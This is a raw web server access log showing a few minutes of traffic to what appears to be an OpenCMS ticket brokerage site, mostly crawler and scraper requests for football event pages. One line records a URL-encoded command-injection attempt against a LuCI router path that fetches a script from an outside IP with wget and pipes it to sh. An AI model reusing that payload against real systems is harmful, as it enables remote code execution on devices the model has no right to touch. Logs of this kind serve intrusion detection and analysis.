192.99.3.137 - - [30/Jun/2024:02:40:56 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=F5D9FA6B-D079-1465-CABB-C57670C881C2 HTTP/1.1" 404 -
216.245.221.83 - - [30/Jun/2024:02:40:56 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
3.224.220.101 - - [30/Jun/2024:02:41:00 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/bundesliga/mainz/ HTTP/1.1" 200 74254
141.98.11.166 - - [30/Jun/2024:02:41:00 +0200] "GET /ticket2/opencms/dk/ HTTP/1.0" 200 91647
158.220.119.234 - - [30/Jun/2024:02:41:03 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=3E844C64-2B32-A35E-237A-EDAC48338BDA&sortorder=desc&column=row HTTP/1.1" 404 -
3.224.220.101 - - [30/Jun/2024:02:41:04 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/banners/sv/FSV_Mainz_05.jpg HTTP/1.1" 200 35116
192.99.3.137 - - [30/Jun/2024:02:41:04 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=F8B6926A-3DA5-3449-0D9B-7E103703EFF6&sortorder=desc&column=section HTTP/1.1" 404 -
23.22.35.162 - - [30/Jun/2024:02:41:08 +0200] "GET /ticket2/opencms/en/sport/football-tickets/la-liga/barcelona/ HTTP/1.1" 200 73210
158.220.119.234 - - [30/Jun/2024:02:41:10 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=3ED842FC-FF3B-D3BC-69A3-8AB7FF361EA5&sortorder=desc&column=row HTTP/1.1" 404 -
23.22.35.162 - - [30/Jun/2024:02:41:11 +0200] "GET /ticket2/opencms/en/sport/football-tickets/serie_a/frosinone/ HTTP/1.1" 200 73267
192.99.3.137 - - [30/Jun/2024:02:41:12 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=FF69DC98-99E2-FC49-3EB6-F7154192E9EB&sortorder=desc&column=price HTTP/1.1" 404 -
101.47.4.10 - - [30/Jun/2024:02:41:13 +0200] "GET /ticket2/export/pics/sport/premier_league_sub.gif HTTP/1.1" 200 17611
3.224.220.101 - - [30/Jun/2024:02:41:16 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/la_liga/mallorca/ HTTP/1.1" 200 74223
158.220.124.16 - - [30/Jun/2024:02:41:16 +0200] "GET /ticket2/opencms/se/nl/buy/?page=1&edid=BFC8ECC1-2107-AC46-D638-419C26368D40&sortorder=desc&column=row HTTP/1.1" 404 -
158.220.119.234 - - [30/Jun/2024:02:41:17 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=3F110F0C-E1EC-6A54-956B-ED3BBFFE0B12&sortorder=desc&column=price HTTP/1.1" 404 -
192.99.3.137 - - [30/Jun/2024:02:41:18 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=10&eventid=B45AC244-DB10-0539-6625-12AA68C37378&venueid=5B101BF6-93E5-0E68-CC24-F8AEC762D8E3 HTTP/1.1" 404 -
51.222.253.7 - - [30/Jun/2024:02:41:19 +0200] "GET /ticket2/opencms/en/venue/?venueid=04A9823B-8F69-B2B4-6AE5-8FC04D38A9D5 HTTP/1.1" 200 71362
3.224.220.101 - - [30/Jun/2024:02:41:20 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/la_liga/valencia/ HTTP/1.1" 200 73876
23.22.35.162 - - [30/Jun/2024:02:41:24 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/serie_a/sassuolo/ HTTP/1.1" 200 74117
158.220.119.234 - - [30/Jun/2024:02:41:24 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=3FF54EFF-D69B-4E34-5BB8-054563E7D776&sortorder=desc&column=row HTTP/1.1" 404 -
192.99.3.137 - - [30/Jun/2024:02:41:26 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&eventid=36E87A41-E1FA-B8E4-50DF-AFD85DD61DB4 HTTP/1.1" 404 -
52.70.240.171 - - [30/Jun/2024:02:41:28 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/serie_a/atalanta/ HTTP/1.1" 200 74408
158.220.119.234 - - [30/Jun/2024:02:41:31 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=4018F88A-4AA6-E738-1F44-74C10A1CA3AA HTTP/1.1" 404 -
3.224.220.101 - - [30/Jun/2024:02:41:32 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/serie_a/cagliari/ HTTP/1.1" 200 74694
192.99.3.137 - - [30/Jun/2024:02:41:33 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7EF04817-972D-18B1-F941-DE800D088075&eventid=19FE0ECF-0C15-9916-F4F4-CFCB91C42B1A HTTP/1.1" 404 -
23.22.35.162 - - [30/Jun/2024:02:41:36 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/serie_a/juventus/ HTTP/1.1" 200 74259
158.220.119.234 - - [30/Jun/2024:02:41:38 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=408DC2B5-4516-E324-6394-41780E7D76AE HTTP/1.1" 404 -
192.99.3.137 - - [30/Jun/2024:02:41:38 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=D08E96E8-A514-9E09-4E22-63713911E0B8&eventid=121DAAE3-090B-56E7-E96D-94ED485637F9 HTTP/1.1" 404 -
3.224.220.101 - - [30/Jun/2024:02:41:40 +0200] "GET /ticket2/opencms/no/sport/motor/formel_1/ HTTP/1.1" 200 76717
158.220.124.16 - - [30/Jun/2024:02:41:44 +0200] "GET /ticket2/opencms/se/nl/buy/?page=1&edid=C261BF23-6CC3-A3C4-F738-0D936DE598A2&sortorder=desc&column=row HTTP/1.1" 404 -
52.70.240.171 - - [30/Jun/2024:02:41:44 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/banners/no/formula_no.png HTTP/1.1" 200 78403
158.220.119.234 - - [30/Jun/2024:02:41:45 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=408DC2B5-4516-E324-6394-41780E7D76AE&sortorder=desc&column=section HTTP/1.1" 404 -
3.224.220.101 - - [30/Jun/2024:02:41:48 +0200] "GET /ticket2/opencms/en/sport/football-tickets/bundesliga/mainz/ HTTP/1.1" 200 73014
192.99.3.137 - - [30/Jun/2024:02:41:50 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=03208385-D01E-F3E2-867D-8006D926BFD1 HTTP/1.1" 404 -
52.167.144.190 - - [30/Jun/2024:02:41:50 +0200] "GET /ticket2/opencms/no/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=2FC3D548-EAF9-1354-0CD2-7D7619DA2334 HTTP/1.1" 200 83074
158.220.119.234 - - [30/Jun/2024:02:41:53 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=42D53B45-7F4F-2704-4721-7FDBFDD48C06&sortorder=asc&column=section HTTP/1.1" 404 -
23.22.35.162 - - [30/Jun/2024:02:41:54 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/bundesliga/koln/ HTTP/1.1" 200 74270
23.22.35.162 - - [30/Jun/2024:02:41:56 +0200] "GET /ticket2/opencms/en/sport/football-tickets/la-liga/mallorca/ HTTP/1.1" 200 73361
40.77.167.56 - - [30/Jun/2024:02:41:58 +0200] "GET /ticket2/opencms/dk/buy/?page=1&edid=2B9FDAA5-4F91-9556-CB1B-77F0011A2F02 HTTP/1.1" 200 110577
158.220.124.16 - - [30/Jun/2024:02:41:58 +0200] "GET /ticket2/opencms/se/nl/buy/?page=1&edid=C261BF23-6CC3-A3C4-F738-0D936DE598A2&sortorder=desc&column=section HTTP/1.1" 404 -
52.70.240.171 - - [30/Jun/2024:02:42:00 +0200] "GET /ticket2/opencms/en/sport/football-tickets/la-liga/valencia/ HTTP/1.1" 200 73064
158.220.119.234 - - [30/Jun/2024:02:42:00 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=4371E61B-D7D8-C72B-4260-B87CF5EA1120 HTTP/1.1" 404 -
192.99.3.137 - - [30/Jun/2024:02:42:01 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=037F7D58-F025-6DA7-A67A-3BE5E3996F20&sortorder=desc&column=price HTTP/1.1" 404 -
23.22.35.162 - - [30/Jun/2024:02:42:04 +0200] "GET /ticket2/opencms/en/sport/football-tickets/serie_a/sassuolo/ HTTP/1.1" 200 73327
158.220.119.234 - - [30/Jun/2024:02:42:07 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=437F7F57-119B-3C88-4AE1-DB313FC6EF55&sortorder=asc&column=row HTTP/1.1" 404 -
23.22.35.162 - - [30/Jun/2024:02:42:07 +0200] "GET /ticket2/opencms/en/sport/football-tickets/serie_a/atalanta/ HTTP/1.1" 200 73279
158.220.124.16 - - [30/Jun/2024:02:42:08 +0200] "GET /ticket2/opencms/se/nl/buy/?page=1&edid=C26A8380-482D-554A-67BA-0EC562670447&sortorder=desc&column=row HTTP/1.1" 404 -
192.99.3.137 - - [30/Jun/2024:02:42:12 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=0C84A327-AD04-E1C5-8085-D5DCFD61822A HTTP/1.1" 404 -
3.224.220.101 - - [30/Jun/2024:02:42:12 +0200] "GET /ticket2/opencms/en/sport/football-tickets/serie_a/cagliari/ HTTP/1.1" 200 73282
216.245.221.83 - - [30/Jun/2024:02:42:13 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
158.220.119.234 - - [30/Jun/2024:02:42:13 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=44052F65-FE80-F7BA-2BCE-175D77C114FC&sortorder=desc&column=section HTTP/1.1" 404 -
216.245.221.83 - - [30/Jun/2024:02:42:14 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
3.224.220.101 - - [30/Jun/2024:02:42:16 +0200] "GET /ticket2/opencms/en/sport/football-tickets/serie_a/juventus/ HTTP/1.1" 200 73215
51.222.253.13 - - [30/Jun/2024:02:42:16 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=C48671DB-5AEB-8CE2-928E-38417FFBE085 HTTP/1.1" 200 83606
178.159.37.55 - - [30/Jun/2024:02:42:17 +0200] "GET /ticket2/opencms/ HTTP/1.0" 302 -
178.159.37.55 - - [30/Jun/2024:02:42:17 +0200] "GET /ticket2/opencms/en/ HTTP/1.0" 200 91208
178.159.37.55 - - [30/Jun/2024:02:42:18 +0200] "GET /ticket2/opencms/en/about/contact HTTP/1.0" 200 70952
3.224.220.101 - - [30/Jun/2024:02:42:20 +0200] "GET /ticket2/opencms/en/sport/football-tickets/serie_a/ac_milan/ HTTP/1.1" 200 73550
158.220.119.234 - - [30/Jun/2024:02:42:20 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=45D0E964-F15A-16ED-D99F-8CFB40DF8662&sortorder=asc&column=section HTTP/1.1" 404 -
85.208.96.202 - - [30/Jun/2024:02:42:21 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/la_liga/barcelona/ HTTP/1.1" 200 76564
192.99.3.137 - - [30/Jun/2024:02:42:23 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=0E19E86A-1D67-848F-569E-BCBDFE5101EE HTTP/1.1" 404 -
3.224.220.101 - - [30/Jun/2024:02:42:24 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/la_liga/osasuna/ HTTP/1.1" 200 73953
158.220.124.16 - - [30/Jun/2024:02:42:24 +0200] "GET /ticket2/opencms/se/nl/buy/?page=1&edid=C26A8380-482D-554A-67BA-0EC562670447&sortorder=desc&column=section HTTP/1.1" 404 -
158.220.119.234 - - [30/Jun/2024:02:42:27 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=4707B237-2172-6DED-7054-CEC9CFBB0C66 HTTP/1.1" 404 -
23.22.35.162 - - [30/Jun/2024:02:42:28 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/la_liga/granada/ HTTP/1.1" 200 73891
66.249.66.87 - - [30/Jun/2024:02:42:29 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/premier_league/ HTTP/1.1" 200 80300
192.99.3.137 - - [30/Jun/2024:02:42:31 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=0E658288-02D3-BB03-7C93-2B756063BA20 HTTP/1.1" 404 -
23.22.35.162 - - [30/Jun/2024:02:42:32 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/la_liga/levante/ HTTP/1.1" 200 73380
52.70.240.171 - - [30/Jun/2024:02:42:36 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/banners/team/la_liga/levante.png HTTP/1.1" 200 71927
158.220.119.234 - - [30/Jun/2024:02:42:36 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=4724E241-4EDF-6BA5-B9E1-0A7235D75886 HTTP/1.1" 404 -
158.220.124.16 - - [30/Jun/2024:02:42:39 +0200] "GET /ticket2/opencms/se/nl/buy/?page=1&edid=C2C96D4A-A8C3-D5FC-2638-E050ECF38B9E&sortorder=asc&column=price HTTP/1.1" 404 -
52.70.240.171 - - [30/Jun/2024:02:42:39 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/la_liga/almeria/ HTTP/1.1" 200 74337
192.99.3.137 - - [30/Jun/2024:02:42:43 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=0E78FCAC-2C27-F7B4-A879-E4B000248D28 HTTP/1.1" 404 -
52.70.240.171 - - [30/Jun/2024:02:42:44 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/la_liga/sevilla/ HTTP/1.1" 200 74073
158.220.119.234 - - [30/Jun/2024:02:42:44 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=474F8C01-7120-DA67-D128-761352136E20 HTTP/1.1" 404 -
52.167.144.190 - - [30/Jun/2024:02:42:48 +0200] "GET /ticket2/opencms/fi/urheilu/jalkapallo/bundesliga/hoffenheim/ HTTP/1.1" 200 74784
52.70.240.171 - - [30/Jun/2024:02:42:49 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/serie_a/bologna/ HTTP/1.1" 200 74104
114.119.145.239 - - [30/Jun/2024:02:42:50 +0200] "GET /ticket2/opencms/en/sell/?edid=50F18BFF-700E-1E6F-C17F-C358E206F903 HTTP/1.1" 302 -
23.22.35.162 - - [30/Jun/2024:02:42:51 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/serie_a/udinese/ HTTP/1.1" 200 73897
158.220.119.234 - - [30/Jun/2024:02:42:52 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=47A673BE-C245-9F8B-C91F-05F588A16FEE HTTP/1.1" 404 -
192.99.3.137 - - [30/Jun/2024:02:42:53 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=0EF8B22E-BE68-12EF-B463-EE507CBF5141&sortorder=desc&column=row HTTP/1.1" 404 -
114.119.145.239 - - [30/Jun/2024:02:42:54 +0200] "GET /ticket2/opencms/en/login/?url=/en/sell/ HTTP/1.1" 200 73431
158.220.124.16 - - [30/Jun/2024:02:42:55 +0200] "GET /ticket2/opencms/se/nl/buy/?page=1&edid=C3165088-0871-A664-2A94-8C277D4CEE8F&sortorder=desc&column=row HTTP/1.1" 404 -
3.224.220.101 - - [30/Jun/2024:02:42:56 +0200] "GET /ticket2/opencms/en/about/press/ HTTP/1.1" 200 71926
158.220.119.234 - - [30/Jun/2024:02:42:59 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=47A673BE-C245-9F8B-C91F-05F588A16FEE&sortorder=desc&column=row HTTP/1.1" 404 -
3.224.220.101 - - [30/Jun/2024:02:43:00 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/content/about_t2_en.png HTTP/1.1" 200 18162
192.99.3.137 - - [30/Jun/2024:02:43:01 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=0EF8B22E-BE68-12EF-B463-EE507CBF5141&sortorder=desc&column=section HTTP/1.1" 404 -
3.224.220.101 - - [30/Jun/2024:02:43:04 +0200] "GET /ticket2/opencms/en/sport/football-tickets/bundesliga/koln/ HTTP/1.1" 200 73108
191.93.220.82 - - [30/Jun/2024:02:43:05 +0200] "GET /ticket2/opencms/semalt.com/ HTTP/1.1" 404 -
158.220.119.234 - - [30/Jun/2024:02:43:06 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=480E7B33-B8FB-DE6E-BC2D-C94272347172 HTTP/1.1" 404 -
192.99.3.137 - - [30/Jun/2024:02:43:07 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=0F8FC4F8-2FB4-7AC0-1C11-E3AC9DE072FF HTTP/1.1" 404 -
52.70.240.171 - - [30/Jun/2024:02:43:08 +0200] "GET /ticket2/opencms/en/sport/football-tickets/la-liga/granada/ HTTP/1.1" 200 73323
23.22.35.162 - - [30/Jun/2024:02:43:12 +0200] "GET /ticket2/opencms/en/sport/football-tickets/la-liga/osasuna/ HTTP/1.1" 200 73328
192.99.3.137 - - [30/Jun/2024:02:43:13 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=11D1149A-F4B7-F104-E5AE-C70D8A130A49 HTTP/1.1" 404 -
158.220.119.234 - - [30/Jun/2024:02:43:14 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=480EA493-0E5F-7F69-07F4-58B5BF351D39 HTTP/1.1" 404 -
158.220.124.16 - - [30/Jun/2024:02:43:14 +0200] "GET /ticket2/opencms/se/nl/buy/?page=1&edid=C32BEB15-55D2-1548-116A-C7D99E01DEF9 HTTP/1.1" 404 -
3.224.220.101 - - [30/Jun/2024:02:43:16 +0200] "GET /ticket2/opencms/en/sport/football-tickets/la-liga/almeria/ HTTP/1.1" 200 73104
51.222.253.8 - - [30/Jun/2024:02:43:18 +0200] "GET /ticket2/opencms/sv/buy/?page=10&eventid=51142925-34D0-DC94-FE4A-BE4925423608&venueid=279B18FD-4210-8852-93EB-A84B5C61044A HTTP/1.1" 200 73555
192.99.3.137 - - [30/Jun/2024:02:43:18 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=11E0F3F3-866B-8B11-2E4F-E306B11A08DD&sortorder=desc&column=price HTTP/1.1" 404 -
52.70.240.171 - - [30/Jun/2024:02:43:19 +0200] "GET /ticket2/opencms/en/sport/football-tickets/la-liga/sevilla/ HTTP/1.1" 200 73331
66.249.92.132 - - [30/Jun/2024:02:43:21 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/premier_league/ HTTP/1.1" 200 80300
158.220.119.234 - - [30/Jun/2024:02:43:21 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=487B066D-7DEA-8E6B-4CD8-CBF5B3729A0B HTTP/1.1" 404 -
192.99.3.137 - - [30/Jun/2024:02:43:23 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=1427E756-F4A7-B2F4-6650-B589AF0D1AA9 HTTP/1.1" 404 -
23.22.35.162 - - [30/Jun/2024:02:43:24 +0200] "GET /ticket2/opencms/en/sport/football-tickets/serie_a/bologna/ HTTP/1.1" 200 73227
185.157.223.150 - - [30/Jun/2024:02:43:25 +0200] "GET /ticket2/tickets_export/outgoing/export.txt HTTP/1.1" 200 24553702
185.191.127.212 - - [30/Jun/2024:02:43:25 +0200] "GET /ticket2/opencms/de/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%253E%2560wget+http%253A%252F%252F93.123.72.16%252Ft+-O-+%7c+sh%2560) HTTP/1.1" 404 -
3.224.220.101 - - [30/Jun/2024:02:43:28 +0200] "GET /ticket2/opencms/en/sport/football-tickets/serie_a/udinese/ HTTP/1.1" 200 73196
158.220.119.234 - - [30/Jun/2024:02:43:28 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=488CFEEB-7668-3AEF-11CB-B07BF51583D9 HTTP/1.1" 404 -
192.99.3.137 - - [30/Jun/2024:02:43:29 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=14282964-6CA4-5901-3C6E-0281FDF44872 HTTP/1.1" 404 -
66.249.76.1 - - [30/Jun/2024:02:43:30 +0200] "GET /ticket2/opencms/en HTTP/1.1" 200 91208
3.224.220.101 - - [30/Jun/2024:02:43:32 +0200] "GET /ticket2/opencms/en/sport/football-tickets/serie_a/as_roma/ HTTP/1.1" 200 74194
66.249.66.200 - - [30/Jun/2024:02:43:32 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=89AC8C22-922C-5C69-19DD-247D667ABB39 HTTP/1.1" 200 112414
158.220.124.16 - - [30/Jun/2024:02:43:34 +0200] "GET /ticket2/opencms/se/nl/buy/?page=1&edid=C387B29E-9437-3C16-A65A-97A5EDDE5C2F HTTP/1.1" 404 -
192.99.3.137 - - [30/Jun/2024:02:43:35 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=19BB1AC1-8F38-1934-25CF-79E3627AD75C HTTP/1.1" 404 -
158.220.119.234 - - [30/Jun/2024:02:43:36 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=48E039F7-006E-1F50-BADB-DE9D9973E789 HTTP/1.1" 404 -
3.224.220.101 - - [30/Jun/2024:02:43:36 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/la_liga/girona/ HTTP/1.1" 200 73423
52.70.240.171 - - [30/Jun/2024:02:43:40 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/la_liga/getafe/ HTTP/1.1" 200 73758
192.99.3.137 - - [30/Jun/2024:02:43:40 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=19E6AA26-8C71-91B2-57B1-FE9ADF08994E HTTP/1.1" 404 -
158.220.119.234 - - [30/Jun/2024:02:43:43 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=48EF2A5A-89BF-0729-2E7F-CB005311805C HTTP/1.1" 404 -
3.224.220.101 - - [30/Jun/2024:02:43:44 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/la_liga/alaves/ HTTP/1.1" 200 73521
192.99.3.137 - - [30/Jun/2024:02:43:47 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=1A49873B-BAD7-E45F-53B2-231EBFA49918 HTTP/1.1" 404 -
23.22.35.162 - - [30/Jun/2024:02:43:47 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/serie_a/empoli/ HTTP/1.1" 200 74136
114.119.138.202 - - [30/Jun/2024:02:43:51 +0200] "GET /ticket2/opencms/en/buy?page=1&edid=60532372-36DE-90FC-6B04-5789BEA27CC4 HTTP/1.1" 200 88258
52.70.240.171 - - [30/Jun/2024:02:43:51 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/serie_a/verona/ HTTP/1.1" 200 74059
158.220.119.234 - - [30/Jun/2024:02:43:52 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=48EF2A5A-89BF-0729-2E7F-CB005311805C&sortorder=desc&column=price HTTP/1.1" 404 -
192.99.3.137 - - [30/Jun/2024:02:43:52 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=1AD431B9-2E73-7238-3C33-3B96F0F94C80 HTTP/1.1" 404 -
114.119.150.190 - - [30/Jun/2024:02:43:55 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=4AECB71E-9E06-6EB7-B63B-B603F3E03F24 HTTP/1.1" 200 87589
3.224.220.101 - - [30/Jun/2024:02:43:56 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/serie_a/torino/ HTTP/1.1" 200 73954
192.99.3.137 - - [30/Jun/2024:02:43:58 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=1B897E9D-E533-44D1-184E-05DEA8EB4FEB HTTP/1.1" 404 -
158.220.124.16 - - [30/Jun/2024:02:43:58 +0200] "GET /ticket2/opencms/se/nl/buy/?page=1&edid=C39F342B-47CC-48AF-2B44-DB99C6E88157 HTTP/1.1" 404 -
158.220.119.234 - - [30/Jun/2024:02:43:59 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=48EF2A5A-89BF-0729-2E7F-CB005311805C&sortorder=desc&column=row HTTP/1.1" 404 -
52.70.240.171 - - [30/Jun/2024:02:44:00 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/serie_a/napoli/ HTTP/1.1" 200 74826
192.99.3.137 - - [30/Jun/2024:02:44:03 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=1BC4CE70-7556-3284-DF2A-952AAB199E2A HTTP/1.1" 404 -
3.224.220.101 - - [30/Jun/2024:02:44:04 +0200] "GET /ticket2/opencms/en/sport/football-tickets/la-liga/girona/ HTTP/1.1" 200 73280
158.220.119.234 - - [30/Jun/2024:02:44:06 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=4903F2CC-DF51-B6CF-A5E2-576D6EE4EC8D&sortorder=asc&column=row HTTP/1.1" 404 -
52.70.240.171 - - [30/Jun/2024:02:44:08 +0200] "GET /ticket2/opencms/en/sport/football-tickets/la-liga/getafe/ HTTP/1.1" 200 73314
192.99.3.137 - - [30/Jun/2024:02:44:09 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=1C6CDB49-5D18-CE5A-A5D3-7B5069269A0D HTTP/1.1" 404 -
216.244.66.237 - - [30/Jun/2024:02:44:12 +0200] "GET /ticket2/opencms/dk/robots.txt HTTP/1.1" 404 -
216.244.66.237 - - [30/Jun/2024:02:44:12 +0200] "GET /ticket2/opencms/dk/robots.txt HTTP/1.1" 404 -
3.224.220.101 - - [30/Jun/2024:02:44:12 +0200] "GET /ticket2/opencms/en/sport/football-tickets/la-liga/alaves/ HTTP/1.1" 200 73223
192.99.3.137 - - [30/Jun/2024:02:44:14 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=1D97A9C1-01DE-0787-4C22-F0C607B7F960 HTTP/1.1" 404 -
158.220.119.234 - - [30/Jun/2024:02:44:14 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=4903F2CC-DF51-B6CF-A5E2-576D6EE4EC8D&sortorder=asc&column=section HTTP/1.1" 404 -
51.222.253.5 - - [30/Jun/2024:02:44:14 +0200] "GET /ticket2/opencms/en/venue/?venueid=D26EFF68-2001-3A5E-1E6D-2A7DCC895275 HTTP/1.1" 200 71327
158.220.124.16 - - [30/Jun/2024:02:44:14 +0200] "GET /ticket2/opencms/se/nl/buy/?page=1&edid=C39F342B-47CC-48AF-2B44-DB99C6E88157&sortorder=asc&column=price HTTP/1.1" 404 -
23.22.35.162 - - [30/Jun/2024:02:44:16 +0200] "GET /ticket2/opencms/en/sport/football-tickets/serie_a/empoli/ HTTP/1.1" 200 73177
3.224.220.101 - - [30/Jun/2024:02:44:19 +0200] "GET /ticket2/opencms/en/sport/football-tickets/serie_a/torino/ HTTP/1.1" 200 73157
192.99.3.137 - - [30/Jun/2024:02:44:19 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=1EF4E706-5097-0A86-8C15-17846FC7046D HTTP/1.1" 404 -
158.220.119.234 - - [30/Jun/2024:02:44:21 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=49131D36-554D-2A5D-24DA-472029203F75 HTTP/1.1" 404 -
172.203.162.106 - - [30/Jun/2024:02:44:22 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/right_side_bar/fi/facebook.png HTTP/1.1" 200 2017
23.22.35.162 - - [30/Jun/2024:02:44:23 +0200] "GET /ticket2/opencms/en/sport/football-tickets/serie_a/napoli/ HTTP/1.1" 200 73169
192.99.3.137 - - [30/Jun/2024:02:44:25 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=1EF4E706-5097-0A86-8C15-17846FC7046D&sortorder=desc&column=price HTTP/1.1" 404 -
23.22.35.162 - - [30/Jun/2024:02:44:28 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/serie_a/monza/ HTTP/1.1" 200 73830
158.220.119.234 - - [30/Jun/2024:02:44:29 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=49131D36-554D-2A5D-24DA-472029203F75&sortorder=desc&column=price HTTP/1.1" 404 -
192.99.3.137 - - [30/Jun/2024:02:44:31 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=1F639E94-CF6E-403B-2FCC-FBB087375287&sortorder=desc&column=row HTTP/1.1" 404 -
52.70.240.171 - - [30/Jun/2024:02:44:32 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/serie_a/lecce/ HTTP/1.1" 200 73837
158.220.124.16 - - [30/Jun/2024:02:44:33 +0200] "GET /ticket2/opencms/se/nl/buy/?page=1&edid=C39F342B-47CC-48AF-2B44-DB99C6E88157&sortorder=asc&column=row HTTP/1.1" 404 -
66.249.66.69 - - [30/Jun/2024:02:44:34 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/premier_league/arsenal/ HTTP/1.1" 404 -
23.22.35.162 - - [30/Jun/2024:02:44:35 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/serie_a/genoa/ HTTP/1.1" 200 73861
